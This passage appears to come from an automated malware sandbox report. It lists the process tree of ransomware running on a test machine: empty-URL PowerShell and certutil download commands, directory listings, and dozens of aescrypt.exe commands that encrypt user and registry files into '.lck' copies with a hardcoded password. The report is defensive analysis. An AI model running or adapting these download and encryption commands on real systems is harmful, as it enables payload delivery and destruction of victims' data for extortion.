    - Suspicious use of AdjustPrivilegeToken
    PID:1640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1076
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:1836
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
    3⤵
    PID:1928
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DenyInstall.eps.lck" "DenyInstall.eps"
    3⤵
    PID:2028
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FormatSend.crw.lck" "FormatSend.crw"
    3⤵
    - Modifies extensions of user files
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StartTest.emf.lck" "StartTest.emf"
    3⤵
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "OpenEnter.tif.lck" "OpenEnter.tif"
    3⤵
    - Modifies extensions of user files
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UndoRead.eps.lck" "UndoRead.eps"
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SplitConfirm.dib.lck" "SplitConfirm.dib"
    3⤵
    PID:224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WaitResize.dwg.lck" "WaitResize.dwg"
    3⤵
    PID:952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnlockNew.dxf.lck" "UnlockNew.dxf"
    3⤵
    PID:1016
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeDisconnect.dib.lck" "InvokeDisconnect.dib"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BlockWrite.cr2.lck" "BlockWrite.cr2"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExportGroup.png.lck" "ExportGroup.png"
    3⤵
    - Modifies extensions of user files
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RenameConnect.tif.lck" "RenameConnect.tif"
    3⤵
    - Modifies extensions of user files
    PID:1176
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnblockUnlock.dxf.lck" "UnblockUnlock.dxf"
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "WatchRename.png.lck" "WatchRename.png"
    3⤵
    - Modifies extensions of user files
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EnterRequest.raw.lck" "EnterRequest.raw"
    3⤵
    - Modifies extensions of user files
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ConvertSplit.wmf.lck" "ConvertSplit.wmf"
    3⤵
    PID:1720
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindAdd.png.lck" "FindAdd.png"
    3⤵
    - Modifies extensions of user files
    PID:1640
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "AssertReset.pcx.lck" "AssertReset.pcx"
    3⤵
    PID:1468
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisconnectMeasure.tiff.lck" "DisconnectMeasure.tiff"
    3⤵
    - Modifies extensions of user files
    PID:972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "TraceCompress.svgz.lck" "TraceCompress.svgz"
    3⤵
    PID:1184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    PID:1780
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:876
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:344
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SearchComplete.mov.lck" "SearchComplete.mov"
    3⤵
    PID:932
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InstallAssert.dwg.lck" "InstallAssert.dwg"
    3⤵
    PID:1076
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "GroupOptimize.wmx.lck" "GroupOptimize.wmx"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RedoImport.DVR.lck" "RedoImport.DVR"
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "LockRemove.php.lck" "LockRemove.php"
    3⤵
    PID:1224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ResumeJoin.wps.lck" "ResumeJoin.wps"
    3⤵
    PID:1656
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "GetRestore.ppt.lck" "GetRestore.ppt"
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExportDisconnect.ocx.lck" "ExportDisconnect.ocx"
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CompleteReset.vst.lck" "CompleteReset.vst"
    3⤵
    PID:2016
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "EnableClose.mov.lck" "EnableClose.mov"
    3⤵
    PID:848
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveInvoke.wmf.lck" "MoveInvoke.wmf"
    3⤵
    PID:1576
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnblockUnlock.xml.lck" "UnblockUnlock.xml"
    3⤵
    PID:1540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "JoinInvoke.xsl.lck" "JoinInvoke.xsl"
    3⤵
    PID:872
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StopJoin.search-ms.lck" "StopJoin.search-ms"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RepairRedo.asp.lck" "RepairRedo.asp"
    3⤵
    PID:1572
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ConnectUpdate.htm.lck" "ConnectUpdate.htm"
    3⤵
    PID:2040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ExitCheckpoint.nfo.lck" "ExitCheckpoint.nfo"
    3⤵
    PID:1744
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MeasureOptimize.tif.lck" "MeasureOptimize.tif"
    3⤵
    PID:1040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchExport.odt.lck" "SwitchExport.odt"
    3⤵
    PID:1476
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "GetTest.mp4.lck" "GetTest.mp4"
    3⤵
    PID:884
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnpublishUnregister.xml.lck" "UnpublishUnregister.xml"
    3⤵
    PID:1080
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisableFind.svg.lck" "DisableFind.svg"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1780
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ApproveGet.dll.lck" "ApproveGet.dll"
    3⤵
    PID:1364
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CloseMount.hta.lck" "CloseMount.hta"
    3⤵
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "MoveStop.inf.lck" "MoveStop.inf"
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "JoinFind.dotm.lck" "JoinFind.dotm"
    3⤵
    PID:876
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SwitchOut.docx.lck" "SwitchOut.docx"
    3⤵
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "StartOut.mp3.lck" "StartOut.mp3"
    3⤵
    PID:1020
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnregisterRemove.3gp.lck" "UnregisterRemove.3gp"
    3⤵
    PID:1680
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RegisterShow.html.lck" "RegisterShow.html"
    3⤵
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FindOut.wm.lck" "FindOut.wm"
    3⤵
    PID:1972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnpublishClose.xlsx.lck" "UnpublishClose.xlsx"
    3⤵
    PID:968
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UpdateSkip.nfo.lck" "UpdateSkip.nfo"
    3⤵
    PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:1176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:968
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:1368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:528
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:1040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:1020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:752
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ntuser.ini.lck" "ntuser.ini"
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "deployment.properties.lck" "deployment.properties"
    3⤵
    PID:1112
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"
    3⤵
    PID:1076
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"
    3⤵
    PID:1680
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"
    3⤵
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"
    3⤵
    PID:1224
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NTUSER.DAT.lck" "NTUSER.DAT"
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1704
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1832
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:872
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1160
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:972
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:540
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:1640
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:296
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1948
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck" "IconCache.db"
    3⤵
    PID:1616
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck" "IconCache.db.lck"
    3⤵
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck" "IconCache.db.lck.lck"
    3⤵
    PID:1368
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "IconCache.db.lck.lck.lck.lck" "IconCache.db.lck.lck.lck"
    3⤵
    PID:1040
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
